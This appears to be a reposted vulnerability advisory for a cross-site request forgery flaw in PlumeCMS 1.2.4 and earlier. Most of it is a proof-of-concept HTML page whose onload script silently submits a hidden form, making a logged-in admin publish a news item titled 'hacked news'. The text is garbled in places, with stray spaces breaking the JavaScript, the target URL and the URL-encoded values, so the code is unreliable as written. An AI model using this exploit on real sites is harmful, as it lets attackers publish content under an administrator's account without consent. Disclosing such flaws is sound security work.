Title: PlumeCMS <= 1.2.4 CSRF Vulnerability
By Ivano Binetti (http://ivanobinetti.com)
: Http://sourceforge.net/projects/pxsystem/files/latest/download? Source = directory
Development Site: http://pxsystem.sourceforge.net/
Affected Versions: 1.2.4 latest and earlier versions
Test System: Debian Squeeze (6.0)
[Insert and publish NEWS by Ivano Binetti]
Summary
1) defect description
2) test
1) defect description
PlumeCMS is prone to a CSRF Vulnerability which allows an attacker to insert and publish "News" (as PlumeCMS names his articles) when
Authenticated admin browses a web page containing the following html/javascript code.
2) test
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to add and publish News </H2>
<Form method = "POST" name = "form0" action = "http://www.bkjia.com/plume/manager/news. php">
<Input type = "hidden" name = "n_category_id" value = "1"/>
<Input type = "hidden" name = "n_content_format" value = "html"/>
<Input type = "hidden" name = "n_status" value = "1"/>
<Input type = "hidden" name = "n_comment_support" value = "1"/>
<Input type = "hidden" name = "n_subtype" value = "2"/>
<Input type = "hidden" name = "n_title" value = "hacked news"/>
<Input type = "hidden" name = "n_content" value = "% 3Cp % 3Etest2% 3C % 2Fp % 3E"/>
<Input type = "hidden" name = "n_subject" value = ""/>
<Input type = "hidden" name = "n_titlewebsite" value = ""/>
<Input type = "hidden" name = "n_linkwebsite" value = ""/>
<Input type = "hidden" name = "publish" value = "Save + % 5Bs % 5D"/>
</Form>
</Body>
</Html>